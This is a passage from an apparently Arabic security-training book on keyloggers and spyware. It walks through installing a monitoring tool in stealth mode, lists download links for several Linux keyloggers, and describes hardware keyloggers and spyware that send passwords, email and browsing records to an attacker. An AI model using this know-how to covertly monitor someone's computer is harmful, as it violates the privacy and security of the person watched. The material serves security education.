ﺷﻲء وﺳوف ﯾﺳﺟل ﻋدد ﻣن اﻻﻣور ﺑﺎﻟﻧﺳﺑﺔ ﻟك ﺣول ﻧﺷﺎط اﻟﻣﺳﺗﺧدم ﻋﻠﻰ اﻟﻛﻣﺑﯾوﺗر.
-1ﻧﺑدأ ﻋﻣﻠﯾﺔ اﻟﺗﺛﺑﯾت ﻋن طرﯾﻖ إﺗﺑﺎع Wizardاﻟﺧﺎص ﺑﻌﻣﻠﯾﺔ اﻟﺗﺛﺑﯾت ﺣﺗﻰ ﻧﺻل اﻟﻰ ھذه اﻟﻣرﺣﻠﺔ ﻣن ﻋﻣﻠﯾﺔ اﻟﺗﺛﺑﯾت:
-2ﻓﻲ ھذه اﻟﻣرﺣﻠﺔ ﻣن ﻋﻣﻠﯾﺔ اﻟﺗﺛﺑﯾت ﻧﺧﺗﺎر Administrator/Testerﺛم ﻧﻘوم ﺑﺎﻟﻧﻘر ﻓوق Nextﺣﺗﻰ ﻧﺻل اﻟﻰ اﻟﺷﺎﺷﺔ اﻟﺗﺎﻟﯾﺔ:
-3ﻧﻧﻘر ﻓوق Yesﺛم Nextﺣﺗﻰ ﺗظﮭر اﺧر ﻣرﺣﻠﮫ وﻓﯾﮭﺎ ﻧﻧﻘر ﻓوق Closeﺣﺗﻰ ﻧﻧﺗﮭﻲ ﻣن ﻋﻣﻠﯾﮫ اﻟﺗﺛﺑﯾت ﺛم ﺗظﮭر ﺷﺎﺷﮫ اﻟﺗطﺑﯾﻖ
اﻷﺳﺎﺳﯾﺔ وﻧﻧﻘر ﻓوق continueﺣﺗﻰ ﺗظﮭر اﻟﺷﺎﺷﺔ اﻟﺗﺎﻟﯾﺔ واﻟﺗﻲ ﺗطﻠب ادﺧﺎل ﻛﻠﻣﺔ اﻟﻣرور ﻛﺎﻻﺗﻰ:
-4ﻣن ﺧﻼل ھذه اﻟﺷﺎﺷﺔ ﻧﻘوم ﺑﺈدﺧﺎل ﻛﻠﻣﺔ اﻟﻣرور اﻟﺗﻲ ﺗرﯾدھﺎ ﺛم ﻧﻧﻘر ﻓوق .OK
-5ﺗظﮭر رﺳﺎﻟﺔ ﺗﺧﺑرك ﺑﻧﺟﺎح اﺳﺗﺧدام ﻛﻠﻣﺔ اﻟﻣرور ﺛم ﺑﻌد ذﻟك ﻧﻧﻘر ﻓوق Continueﺣﺗﻰ ﺗظﮭر ﺷﺎﺷﺔ اﻻﻋداد اﻟﺗﺎﻟﯾﺔ:
https://www.facebook.com/tibea2004 د .ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ
408
-6ﻣن ﺧﻼل ھذه اﻟﺷﺎﺷﺔ ﻧﺧﺗﺎر Complete + Stealth Configurationﺛم ﻧﻧﻘر ﻓوق Nextﺛم اﻟﻣرﺣﻠﺔ اﻟﺗﺎﻟﯾﺔ ﻣن ﻋﻣﻠﯾﺔ
اﻻﻋداد ﻧﺧﺗﺎر ﻣن ﻣﺟﻣوﻋﺔ ﺧﯾﺎرات اﺿﺎﻓﯾﮫ Display Alert at Startupﺛم ﻧﻧﻘر ﻓوق Nextﺣﺗﻰ ﻧﺻل اﻟﻰ ﻣرﺣﻠﺔ Finish
وﻧﻧﺗﮭﻲ ﻣن ﻋﻣﻠﯾﺔ اﻻﻋداد.
-7ﺑﻌد اﻻﻧﺗﮭﺎء ﻣن ﻋﻣﻠﯾﺔ اﻻﻋداد واﻟﻧﻘر ﻓوق Finishﺗظﮭر ﺷﺎﺷﮫ أﺧرى ﻧﻧﻘر ﻓوق Continueﺣﺗﻰ ﺗظﮭر اﻟﺷﺎﺷﺔ اﻟرﺋﯾﺳﯾﺔ ﻟﻠﺗطﺑﯾﻖ
ﻛﺎﻻﺗﻰ:
-10ھذه اﻟﺷﺎﺷﺔ ﺗﺧﺑرك اﻧﮫ ﻛﻠﻰ ﺗﻘوم ﺑﺎﻻﻧﺗﻘﺎل اﻟﻰ Stealth modeﯾﻣﻛﻧك ذﻟك ﻣن ﺧﻼل اﻟﻧﻘر ﻓوق .Ctrl+Shift+Alt+M
-11ﻧﻘوم ﺑﺎﻟﻧﻘر ﻓوق okﻟﯾﺑدأ ﺑﻌﻣﻠﯾﺔ رﺻد ﻧﺷﺎط اﻟﺟﮭﺎز واﻟﺗﻲ ﺗؤدى اﻟﻰ ظﮭور رﺳﺎﻟﺔ ﻧﻧﻘر ﻓوق .Continue
-12اﻻن ﻗم ﺑﺗﺻﻔﺢ اﻻﻧﺗرﻧت ،ﺛم ﺑﻌد ذﻟك ﻧﻘوم ﺑﺈﺣﺿﺎر Stealth modeﻋن طرﯾﻖ اﻟﻧﻘر ﻓوق. Ctrl+Shift+Alt+M
-13ﺗؤدى اﻟﻰ ظﮭور ﺷﺎﺷﮫ ﯾطﻠب ﻓﯾﮭﺎ ﻣﻧك ﻛﻠﻣﺔ اﻟﻣرور ﻧﻘوم ﺑﺈدﺧﺎل ﻛﻠﻣﺔ اﻟﻣرور ﺛم اﻟﻧﻘر ﻓوق .Okﺛم ﺑﻌد ذﻟك ﺗظﮭر ﺷﺎﺷﮫ اﻟﺗطﺑﯾﻖ
اﻟرﺋﯾﺳﯾﺔ.
-14ﻟرؤﯾﺔ ﻣﺎ ﻗﺎم ﺑﮫ اﻟﻣﺳﺗﺧدم ﻣن اﻟﻧﻘر ﻋﻠﻰ ﻟوﺣﺔ اﻟﻣﻔﺎﺗﯾﺢ ﻧﻘوم ﺑﺎﺧﺗﯾﺎر Keystrokes Typedواﻟﺗﻲ ﺳوف ﯾﻌرض ﻣﺎ ﻗﺎم ﺑﮫ
اﻟﻣﺳﺗﺧدم ﻣن اﻟﻧﻘر ﻓوق ﻟوﺣﺔ اﻟﻣﻔﺎﺗﯾﺢ ﻛﺎﻻﺗﻰ:
http://kaz.dl.sourceforge.net/project/lkl/lkl-0.1.1/lkl-0.1.1/lkl-0.1.1.tar.gz :اﻟﻣﺻدر
ﯾﺗﺟﺳس وﯾﻘوم ﺑﺗﺳﺟل ﻛل ﺷﻲء ﯾﻣر ﻣن ﺧﻼل ﻣﻧﻔذ ﻟوﺣﺔLKL .linux--x86/arch ھو ﻛﻠوﻏر ﯾﻌﻣل ﻓﻲ ﺑﯾﺋﺔ اﻟﻣﺳﺗﺧدم ﺗﺣتLKL
.اﻟﻣﻔﺎﺗﯾﺢ اﻷﺟﮭزة
Log Key -2
http://logkeys.googlecode.com/files/logkeys-0.1.1a.tar.gz :اﻟﻣﺻدر
Log keysھو ﻛﻠوﻏر ﻣﺧﺻص ﻟﻠﯾﻧﻛس .ﻓﺈﻧﮫ ﻟﯾس أﻛﺛر ﺗﻘدﻣﺎ ﻣن ﻏﯾرھﺎ ﻣن ﻛﻠوﻏر ﻟﯾﻧﻛس اﻟﻣﺗﺎﺣﺔ ،ﻻ ﺳﯾﻣﺎ LKLو ،uberkeyوﻟﻛن ھو
أﺣدث ﻗﻠﯾﻼ ،وأﻛﺛر ﻣﺎ ﯾﺻل إﻟﻰ ﺗﺎرﯾﺦ.
Ttypld -3
اﻟﻣﺻدرhttp://kaz.dl.sourceforge.net/project/ttyrpld/ttyrpld/2.60/ttyrpld-2.60.tar.bz2 :
Ttyrpldﯾﺳﺗﺧدم ﻟﺗﺳﺟﯾل أي ﺣرﻛﺔ ﻣرور واﻹﺟراءات اﻟﺗﻲ ﺗذھب ﻣن ﺧﻼل أي ﻣن أﺟﮭزة TTYﻧواة اﻟﺧﺎص ﺑك.
uber key -4
اﻟﻣﺻدرftp://ftp.nz.debian.org/freebsd/ports/distfiles/uberkey-1.2.tar.gz :
Vlogger -5
اﻟﻣﺻدرhttp://www.thc.org/releases/vlogger-2.1.1.tar.gz :
Simple Keylogger Python script -6
اﻟﻣﺻدرhttp://kaz.dl.sourceforge.net/project/linuxkeylogger/keylogger.py:
ﻟﻣزﯾد ﻣن اﻟﻣﻌﻠوﻣﺎت ﻋن طرﯾﻘﺔ ﻋﻣل اﻟﻛﯾﻠوﺟرز ﻓﻲ ﻧظﺎم اﻟﺗﺷﻐﯾل ﻟﯾﻧﻛس ﯾﻣﻛﻧك زﯾﺎرة اﻟراﺑط اﻟﺗﺎﻟﻲ
https://www.thc.org/papers/writing-linux-kernel-keylogger.txt
Hardware Keyloggers
Hardware Keyloggerھو ﻋﺑﺎره ﻋن أﺟﮭزه ﯾﺗم ﺗوﺻﯾﻠﮭﺎ ﺑﯾن ﻟوﺣﺔ اﻟﻣﻔﺎﺗﯾﺢ واﻟﻛﻣﺑﯾوﺗر .ﯾﺗم اﺳﺗﺧداﻣﮫ ﻟﺗﺳﺟﯾل ﺿرﺑﺎت اﻟﻣﻔﺎﺗﯾﺢ ﻋﻠﻰ
اﻟﻛﻣﺑﯾوﺗر اﻟﻣﺳﺗﺧدم اﻟﮭدف Hardware Keylogger .ﺗﺳﺟﯾل ﺟﻣﯾﻊ ﻧﺷﺎطﺎت ﻟوﺣﺔ اﻟﻣﻔﺎﺗﯾﺢ إﻟﻰ ذاﻛرة اﻟداﺧﻠﯾﺔ .ﻣﯾزة Hardware
Keyloggerﻋﻠﻰ ﺗطﺑﯾﻘﺎت ﻛﻠوﻏر ھو إﻣﻛﺎﻧﯾﺔ ﺗﺳﺟﯾﻠﮭﺎ ﺿﻐطﺎت اﻟﻣﻔﺎﺗﯾﺢ ﻓﻲ أﻗرب وﻗت ﻣﻣﻛن ﺑدء ﺗﺷﻐﯾل اﻟﻛﻣﺑﯾوﺗر .ﯾﻣﻛﻧك اﺳﺗﺧدام
Hardware Keyloggerاﻷﺗﯾﺔ ﻟﺗﺣﻘﯾﻖ أھداﻓك.
KeyGhost
اﻟﻣﺻدرhttp://www.keyghost.com :
Keyghostھو ﺟﮭﺎز ذات اﻟﻣﻛوﻧﺎت اﻟﺻﻐﯾرة ) (tiny plug-in deviceواﻟذى ﯾﻘوم ﺑﺗﺳﺟل ﻛل ﺿﻐطﺔ ﺗﻣت ﻛﺗﺑﺗﮭﺎ ﻋﻠﻰ أي ﺟﮭﺎز
ﻛﻣﺑﯾوﺗر .ﯾﻣﻛﻧك أﯾﺿﺎ رﺻد وﺗﺳﺟﯾل اﻻﺗﺻﺎل ﻋﺑر اﻟﺑرﯾد اﻻﻟﻛﺗروﻧﻲ ،وﻧﺷﺎط ﻏرف اﻟدردﺷﺔ ،واﻟرﺳﺎﺋل اﻟﻔورﯾﺔ ،وﻋﻧﺎوﯾن ﻣواﻗﻊ اﻟوﯾب،
اﻟﺑﺣث ﻓﻲ ﻣﺣرﻛﺎت اﻟﺑﺣث ،وأﻛﺛر ﻣن ذﻟك .ﻻ ﺗﺣﺗﺎج ﻟﺗﺛﺑﯾت أي ﻣن اﻟﺑراﻣﺞ ﻟﺗﺳﺟﯾل ﺿرﺑﺎت اﻟﻣﻔﺎﺗﯾﺢ أو اﺳﺗرداد.
اﻟﻣﯾزات:
-ﺳﮭل ﻓﻲ اﻻﺳﺗﺧدام
-ﯾﺗم ﺗﺛﺑﯾﺗﮫ ﻓﻲ ﺛوان؛ ﺑﻣﺟرد ﺗوﺻﯾﻠﮫ.
-ﯾﻣﻛن اﺳﺗﺧراﺟﮫ ﻣن ﺟﺎھز ) (unpluggedوﺗوﺻﯾﻠﮫ ﺑﺟﮭﺎز اﺧر ﻻﺳﺗرﺟﺎع اﻟﻣﻌﻠوﻣﺎت ﻋﻠﻰ ﻛﻣﺑﯾوﺗر آﺧر.
-ﻻ ﯾﺳﺗﺧدم أي ﻣن ﻣوارد اﻟﻧظﺎم.
-ﻣﻣﺗﺎز ﻓﻲ اﻟﻧﺳﺦ اﻻﺣﺗﯾﺎطﻲ.
KeyGrabber
اﻟﻣﺻدرhttp://www.keydemon.com :
KeyGrabberھو ﺟﮭﺎز ﯾﺳﻣﺢ ﻟك ﺑﺗﺳﺟﯾل ﺿرﺑﺎت اﻟﻣﻔﺎﺗﯾﺢ ﻣن ﻟوﺣﺔ اﻟﻣﻔﺎﺗﯾﺢ ﺳواء PS/2أو .USBأﺟﮭزة ﺗﺳﺟﯾل اﻟﻔﯾدﯾو ھو ﺻﻐﯾرة
اﻹطﺎر ﻻﻟﺗﻘﺎط ﻟﻘطﺎت ﻣن HDMI ،DVI ،VGAأو ﻣﺻدر اﻟﻔﯾدﯾو.
Spyware
اﻟﺗﺟﺳس )(Spywareھو ﺑرﻧﺎﻣﺞ ﻟﻣراﻗﺑﺔ ﺟﮭﺎز اﻟﻛﻣﺑﯾوﺗر ﻣﺗﺧﻔﯾﺎ واﻟﺗﻲ ﺗﺳﻣﺢ ﻟك ﺑﺗﺳﺟﯾل ﺟﻣﯾﻊ اﻷﻧﺷطﺔ اﻟﺗﻲ ﯾﻘوم ﺑﮭﺎ ﻣﺳﺗﺧدم اﻟﻛﻣﺑﯾوﺗر
ﺳرا .ﺣﯾث أﻧﮫ ﺗﻠﻘﺎﺋﯾﺎ ﯾﺳﻠم ﻣﻠﻔﺎت اﻟﺳﺟل ﻋﺑر اﻟﺑرﯾد اﻹﻟﻛﺗروﻧﻲ أو ﺑروﺗوﻛول ﻧﻘل اﻟﻣﻠﻔﺎت ،واﻟﺗﻲ ﺗﺷﻣل ﺟﻣﯾﻊ ﻣﺟﺎﻻت اﻟﻧظﺎم ﻣﺛل إرﺳﺎل
اﻟﺑرﯾد اﻹﻟﻛﺗروﻧﻲ ،اﻟﻣواﻗﻊ اﻟﺗﻲ ﺗﻣت زﯾﺎرﺗﮭﺎ ،ﻛل ﺿﻐطﺔ ﻣﻔﺎﺗﯾﺢ )ﺑﻣﺎ ﻓﻲ ذﻟك ﺗﺳﺟﯾل اﻟدﺧول/ﻛﻠﻣﺔ ﻣرور،AIM ،AOL ،MSN ، ICQ
و Yahoo Messengerأو ، (Webmailﻣﻠف اﻟﻌﻣﻠﯾﺎت ،وﻣﺣﺎدﺛﺎت اﻟدردﺷﺔ ﻋﻠﻰ اﻻﻧﺗرﻧت .ﻓﺈﻧﮫ ﯾﺄﺧذ أﯾﺿﺎ ﻟﻘطﺎت ﻋﻠﻰ ﻓﺗرات ﻣﺣددة،
ﻣﺛل ﻛﺎﻣﯾرا اﻟﻣراﻗﺑﺔ اﻟﻣﺗﺻﻠﺔ ﻣﺑﺎﺷرة ﺑﺷﺎﺷﺔ اﻟﻛﻣﺑﯾوﺗر .ﻋﺎدة ﻣﺎ ﯾﻛون Spywareﻣﻛون ﻣﺧﻔﻲ ﻓﻲ اﻟﺑراﻣﺞ اﻟﻣﺟﺎﻧﯾﺔ أو اﻟﺑراﻣﺞ اﻟﻐﯾر ﻣﺟﺎﻧﯾﺔ
واﻟﺗﻲ ﯾﻣﻛن ﺗﺣﻣﯾﻠﮭﺎ ﻣن اﻹﻧﺗرﻧت.
ﺑﺳﺑب ﻋدم وﺟود اھﺗﻣﺎم ﺑﺎﻟﻧﺳﺑﺔ ﻟﻠﻣﺳﺗﺧدم ﻋﻧد ﺗﺣﻣﯾل وﺗﺛﺑﯾت اﻟﺗطﺑﯾﻘﺎت ﻣن اﻹﻧﺗرﻧت ،ﻓﺄﻧﮫ ﯾﻌطﻰ إﻣﻛﺎﻧﯾﺔ ﺗﺛﺑﯾت ﺑراﻣﺞ اﻟﺗﺟﺳس .ﯾﺗم دﻓﻊ
ﺑراﻣﺞ اﻟﺗﺟﺳس ﻣن ﺧﻼل ﺑراﻣﺞ أﺧرى ﻋﻠﻰ ﺷﺑﻛﺔ اﻹﻧﺗرﻧت ﻣﺛل ﺑراﻣﺞ ﻣﻛﺎﻓﺣﺔ اﻟﺗﺟﺳس وﺗﺷﻐﯾﻠﮭﺎ ﻋﻠﻰ ﺟﮭﺎز اﻟﻛﻣﺑﯾوﺗر اﻟﺧﺎص ﺑﺎﻟﻣﺳﺗﺧدم
دون أي إﺷﻌﺎر ،ﻋﻧدﻣﺎ ﯾﻘوم اﻟﻣﺳﺗﺧدم ﺑﺗﺣﻣﯾل وﺗﺛﺑﯾت اﻟﺑراﻣﺞ اﻟﺗﻲ ﺗﺣﺗوي ﻋﻠﻰ ﺑراﻣﺞ اﻟﺗﺟﺳس.
ﻣﺎ اﻟذي ﯾﻣﻛن أن ﯾﻔﻌﻠﮫ ﺑراﻣﺞ اﻟﺗﺟﺳس What Does the Spyware Do؟
ﺑﻣﺟرد ﻧﺟﺎح ﺗﺛﺑﯾت ﺑراﻣﺞ اﻟﺗﺟﺳس ﻋﻠﻰ ﺟﮭﺎز اﻟﻛﻣﺑﯾوﺗر اﻟﺿﺣﯾﺔ ،ﯾﻣﻛﻧك أن ﺗﻔﻌل أﺷﯾﺎء ﻛﺛﯾرة ﻣﺳﯾﺋﺔ ﻟﻠﻛﻣﺑﯾوﺗر اﻟﺿﺣﯾﺔ .ﯾﻣﻛﻧك اﻟﻘﯾﺎم ﺑﺎﻟﻌدﯾد
ﻣن اﻻﻣور اﻟﺗﺎﻟﯾﺔ ﻣﻊ ﺑراﻣﺞ اﻟﺗﺟﺳس اﻟﻣﺛﺑﺗﺔ ﻋﻠﻰ ﺟﮭﺎز ﻛﻣﺑﯾوﺗر اﻟﺿﺣﯾﺔ:
ﺳرﻗﺔ ﻣﻌﻠوﻣﺎت اﻟﻣﺳﺗﺧدﻣﯾن اﻟﺷﺧﺻﯾﺔ وإرﺳﺎﻟﮭﺎ إﻟﻰ ﻣﻠﻘم ﺑﻌﯾد أو .hijacker -
ﻣراﻗﺑﺔ ﻧﺷﺎط اﻟﻣﺳﺗﺧدﻣﯾن ﻋﻠﻰ اﻻﻧﺗرﻧت. -
ﻋرض اﻟﻧواﻓذ اﻟﻣﻧﺑﺛﻘﺔ اﻟﻣزﻋﺟﺔ وإﻋﺎدة ﺗوﺟﯾﮫ ﻣﺗﺻﻔﺢ اﻹﻧﺗرﻧت ﻟﻣواﻗﻊ اﻹﻋﻼﻧﺎت. -
ﺗﻐﯾﯾر اﻹﻋداد اﻻﻓﺗراﺿﻲ ﻟﻣﺗﺻﻔﺢ اﻟوﯾب وﻣﻧﻊ اﻟﻣﺳﺗﺧدم ﻣن اﺳﺗﻌﺎدﺗﮫ. -
إﺿﺎﻓﺔ اﻟﻌﻼﻣﺎت اﻟﻣﺗﻌددة إﻟﻰ اﻟﻘﺎﺋﻣﺔ اﻟﻣﻔﺿﻠﺔ ﻓﻲ ﻣﺗﺻﻔﺢ اﻹﻧﺗرﻧت -
ﺧﻔض ﻣﺳﺗوى اﻷﻣن اﻟﻌﺎم ﻟﻠﻧظﺎم. -
وﺿﻊ اﺧﺗﺻﺎرات ﺳطﺢ اﻟﻣﻛﺗب إﻟﻰ ﻣواﻗﻊ اﻟﺗﺟﺳس اﻟﺧﺑﯾﺛﺔ. -
اﻻﺗﺻﺎل ﺑﺎﻟﻣواﻗﻊ اﻹﺑﺎﺣﯾﺔ ﻋن ﺑﻌد. -
ﺗﺧﻔﯾض أداء اﻟﻧظﺎم وﯾﺳﺑب أﯾﺿﺎ ﻋدم اﺳﺗﻘرار اﻟﺑرﻣﺟﯾﺎت. -
ﺳرﻗﺔ ﻛﻠﻣﺎت اﻟﺳر اﻟﺧﺎﺻﺔ ﺑك. -
ارﺳﺎل ﺑرﯾد اﻹﻟﻛﺗروﻧﻲ ﻣﺳﺗﮭدف. -
ﺗﻌدﯾل اﻟﻣﻠﻔﺎت (dll) dynamically linked librariesوﺗﺑطﺊ اﻟﻣﺗﺻﻔﺢ. -
ﺗﻐﯾﯾر إﻋدادات ﺟدار اﻟﺣﻣﺎﯾﺔ. -
رﺻد وﻛﺗﺎﺑﺔ ﺗﻘﺎرﯾر ﻋن اﻟﻣواﻗﻊ اﻟﺗﻲ ﯾزورھﺎ اﻟﮭدف. -
ﺑراﻣﺞ ﺗﺟﺳس ﺳطﺢ اﻟﻣﻛﺗب ) (Desktop spywareھو ﺑرﻧﺎﻣﺞ ﯾﺳﻣﺢ ﻟﻠﻣﮭﺎﺟﻣﯾن اﻟﺣﺻول ﻋﻠﻰ ﻣﻌﻠوﻣﺎت ﺣول أﻧﺷطﺔ اﻟﻣﺳﺗﺧدم أو ﺟﻣﯾﻊ
اﻟﻣﻌﻠوﻣﺎت اﻟﺷﺧﺻﯾﺔ ﻋن اﻟﻣﺳﺗﺧدم وإرﺳﺎﻟﮭﺎ ﻋﺑر اﻹﻧﺗرﻧت إﻟﻰ أطراف ﺛﺎﻟﺛﺔ دون ﻋﻠم اﻟﻣﺳﺗﺧدم أو ﻣواﻓﻘﺗﮫ .ﯾوﻓر ﻣﻌﻠوﻣﺎت ﺑﺷﺄن ﻣﺎ ﻓﻌﻠﮫ
ﻣﺳﺗﺧدﻣﻲ اﻟﺷﺑﻛﺔ ﻋﻠﻰ ﺳطﺢ ﻣﻛﺎﺗﺑﮭم) ،(Desktopوﻛﯾف ،وﻣﺗﻰ.
ﺑراﻣﺞ ﺗﺟﺳس ﺳطﺢ اﻟﻣﻛﺗب ﺗﺳﻣﺢ ﻟﻠﻣﮭﺎﺟﻣﯾن ﺑﺗﻧﻔﯾذ ﻣﺎ ﯾﻠﻲ:
-1اﻟﺗﺳﺟﯾل اﻟﺣﻲ ﻟﺳطﺢ اﻟﻣﻛﺗب اﻟﺑﻌﯾد.
-2ﻣراﻗﺑﺔ وﺗﺳﺟﯾل أﻧﺷطﺔ اﻹﻧﺗرﻧت.
-3ﺗﺳﺟﯾل اﺳﺗﺧدام اﻟﺑرﻣﺟﯾﺎت ﺑﺎﻟﺗوﻗﯾت.
-4ﺗﺳﺟﯾل ﻣﻠﻔﺎت ﺳﺟل اﻟﻧﺷﺎط ) (activities logsوﺗﺧزﯾﻧﮭﺎ ﻓﻲ ﻣوﻗﻊ ﻣرﻛزي واﺣد.
-5ﺗﺳﺟﯾل ﺿرﺑﺎت ﻣﻔﺎﺗﯾﺢ اﻟﻣﺳﺗﺧدﻣﯾن.
Email spywareھو ﺑرﻧﺎﻣﺞ أو ﺗطﺑﯾﻖ ﻟرﺻد ،وﺗﺳﺟﯾل ،وﺗوﺟﯾﮫ ﻛﺎﻓﺔ رﺳﺎﺋل اﻟﺑرﯾد اﻹﻟﻛﺗروﻧﻲ اﻟواردة واﻟﺻﺎدرة ،ﺑﻣﺎ ﻓﻲ ذﻟك ﺧدﻣﺎت
اﻟﺑرﯾد اﻹﻟﻛﺗروﻧﻲ ﻣﺛل Hotmailوﺑرﯾد ﯾﺎھو .ﺑﻣﺟرد ﺗﺛﺑﯾﺗﮫ ﻋﻠﻰ ﺟﮭﺎز اﻟﻛﻣﺑﯾوﺗر اﻟذي ﺗرﯾد ﻣراﻗﺑﺔ ،ﻓﺎن ھذا اﻟﻧوع ﻣن ﺗطﺑﯾﻘﺎت اﻟﺗﺟﺳس
ﯾﺳﺟل وﯾرﺳل ﻧﺳﺧﺎ ﻣن ﺟﻣﯾﻊ رﺳﺎﺋل اﻟﺑرﯾد اﻹﻟﻛﺗروﻧﻲ اﻟواردة واﻟﺻﺎدرة ﻟك ﻣن ﺧﻼل ﻋﻧوان اﻟﺑرﯾد اﻹﻟﻛﺗروﻧﻲ اﻟﻣﺣدد أو ﯾﺣﻔظﮫ ﻋﻠﻰ
ﻣﺟﻠد ﻓﻲ اﻟﻘرص اﻟﻣﺣﻠﻲ ﻟﻠﻛﻣﺑﯾوﺗر ﻟرﺻدھﺎ ﻻﺣﻘﺎ .ﯾﻌﻣل ﻓﻲ اﻟوﺿﻊ stealth mode؛ اﻟﻣﺳﺗﺧدﻣﯾن ﻋﻠﻰ اﻟﻛﻣﺑﯾوﺗر ﻻ ﯾﻛون ﻋﻠﻰ ﺑﯾﻧﺔ ﻣن
وﺟود ﺑراﻣﺞ ﺗﺟﺳس اﻟﺑرﯾد اﻹﻟﻛﺗروﻧﻲ ﻋﻠﻰ اﻟﻛﻣﺑﯾوﺗر اﻟﺧﺎص ﺑﮭم .ﻛﻣﺎ أﻧﮭﺎ ﻗﺎدرة ﻋﻠﻰ ﺗﺳﺟﯾل اﻟرﺳﺎﺋل اﻟﻔورﯾﺔ اﻟﺗﻲ أﺟرﯾت ﻓﻲ،AIM :
،MSNﯾﺎھو ،ﻣﺎي ﺳﺑﯾس ،اﻟﻔﯾﺳﺑوك ،اﻟﺦ.
Internet Spywareھﻲ اﻷداة اﻟﺗﻲ ﺗﺳﻣﺢ ﻟك ﺑﻣراﻗﺑﺔ ﺟﻣﯾﻊ ﺻﻔﺣﺎت اﻟوﯾب اﻟﺗﻲ ﺗم اﻟوﺻول إﻟﯾﮭﺎ ﻣن ﻗﺑل اﻟﻣﺳﺗﺧدﻣﯾن ﻋﻠﻰ ﺟﮭﺎز
اﻟﻛﻣﺑﯾوﺗر اﻟﺧﺎص ﺑك ﻓﻲ ﻏﯾﺎﺑك .ﻓﮭو ﯾﺟﻌل ﺳﺟل زﻣﻧﻲ ﻟﺟﻣﯾﻊ ﻋﻧﺎوﯾن اﻟﻣواﻗﻊ اﻟﺗﻲ ﺗﻣت زﯾﺎرﺗﮭﺎ .ھذا ﯾﺣﻣل ﺗﻠﻘﺎﺋﯾﺎ ﻋﻧد ﺑدء ﺗﺷﻐﯾل اﻟﻧظﺎم.
ﯾﺗم ﺗﺷﻐﯾﻠﮫ ﻓﻲ اﻟوﺿﻊ ،stealth modeﻣﻣﺎ ﯾﻌﻧﻲ أﻧﮫ ﯾﻌﻣل ﻓﻲ اﻟﺧﻠﻔﯾﺔ وﻻ ﯾﻣﻛن ﻟﻠﻣﺳﺗﺧدﻣﯾن ﻋﻠﻰ ﺟﮭﺎز اﻟﻛﻣﺑﯾوﺗر اﻟﺧﺎص ﺑك أﺑدا اﻟﻛﺷف
ﻋن ھذه اﻷداة اﻟﻣﺛﺑﺗﺔ ﻋﻠﻰ ﺟﮭﺎز اﻟﻛﻣﺑﯾوﺗر .ﻛﺗﺎﺑﺔ ﺟﻣﯾﻊ ﻋﻧﺎوﯾن URLاﻟﺗﻲ ﺗﻣت زﯾﺎرﺗﮭﺎ ﻣن ﻗﺑل اﻟﻣﺳﺗﺧدم ﻓﻲ ﻣﻠف اﻟﺳﺟل وإرﺳﺎﻟﮭﺎ إﻟﻰ
ﻋﻧوان اﻟﺑرﯾد اﻹﻟﻛﺗروﻧﻲ اﻟﻣﺣدد .ﺑﺎﺳﺗﺧدام ﺑراﻣﺞ ﺗﺟﺳس اﻹﻧﺗرﻧت ،ﯾﻣﻛن ﻟﻠﻣرء أداء ﻣراﻗﺑﺔ اﻟﻧﺷﺎط ﻋﻠﻰ ﺷﺑﻛﺔ اﻹﻧﺗرﻧت ﻋﻠﻰ أي ﺟﮭﺎز
ﻛﻣﺑﯾوﺗر .ﺣﯾث اﻧﮫ ﯾوﻓر ﺗﻘرﯾرا ﻣوﺟزا ﻋن اﺳﺗﺧدام ﺷﺑﻛﺔ اﻹﻧﺗرﻧت ﺑﺷﻛل ﻋﺎم ﻣﺛل اﻟﻣواﻗﻊ اﻟﺗﻲ ﺗﻣت زﯾﺎرﺗﮭﺎ ،واﻟوﻗت اﻟذي ﯾﻘﺿﯾﮫ ﻓﻲ ﻛل
ﻣوﻗﻊ ،ﻓﺿﻼ ﻋن ﻓﺗﺢ ﻛﺎﻓﺔ اﻟﺗطﺑﯾﻘﺎت ﺟﻧﺑﺎ إﻟﻰ ﺟﻧب ﻣﻊ اﻟﺗﺎرﯾﺦ /اﻟوﻗت .ﻛﻣﺎ أﻧﮫ ﯾﺳﻣﺢ ﻟك ﻟﻣﻧﻊ اﻟوﺻول إﻟﻰ ﺻﻔﺣﺔ وﯾب ﻣﻌﯾﻧﺔ أو ﻣوﻗﻊ
ﻛﺎﻣل ﺑذﻛر ﻋﻧﺎوﯾن اﻟﻣواﻗﻊ أو اﻟﻛﻠﻣﺎت اﻟرﺋﯾﺳﯾﺔ اﻟﺗﻲ ﺗرﯾد ﻣﻧﻌﮭﺎ ﻋﻠﻰ ﺟﮭﺎز اﻟﻛﻣﺑﯾوﺗر اﻟﺧﺎص ﺑك.
Email and Internet Spyware: Power Spy
اﻟﻣﺻدرhttp://ematrixsoft.com :
ﺑرﻣﺟﯾﺎت Power Spyﯾﺳﻣﺢ ﻟك ﺑﻣراﻗﺑﺔ ﺟﮭﺎز اﻟﻛﻣﺑﯾوﺗر اﻟﺧﺎص ﺑك ﻣن ﻣﻛﺎن ﺑﻌﯾد ﻛﻠﻣﺎ ﻛﻧت ﺑﻌﯾدا ﻋن ﺟﮭﺎز اﻟﻛﻣﺑﯾوﺗر .ﻓﺈﻧﮫ ﯾﺳﺟل ﻛل
اﺳﺗﺧدام اﻟﻔﯾﺳﺑوك ،وﺿرﺑﺎت اﻟﻣﻔﺎﺗﯾﺢ ورﺳﺎﺋل اﻟﺑرﯾد اﻹﻟﻛﺗروﻧﻲ ،وﻣواﻗﻊ اﻟوﯾب اﻟﺗﻲ ﻗﻣت ﺑزﯾﺎرﺗﮭﺎ ،دردﺷﺎت IMSﻓﻲ Windows
،ICQ ،GADU-GADU ،Google Talk ،Tencent QQ ،Yahoo Messenger ،SKYPE ،(MSN) Live Messenger
،(AIM) AOL Instant Messengerوأﻛﺛر ﻣن ذﻟك .ﺑﺎﻹﺿﺎﻓﺔ إﻟﻰ ذﻟك ،ﻓﺈﻧﮫ ﯾﻘوم ﺑﺗﺳﺟﯾل ﺑﯾﺎﻧﺎت ،clipboardوﻛﻠﻣﺎت اﻟﺳر اﻟﺗﻲ
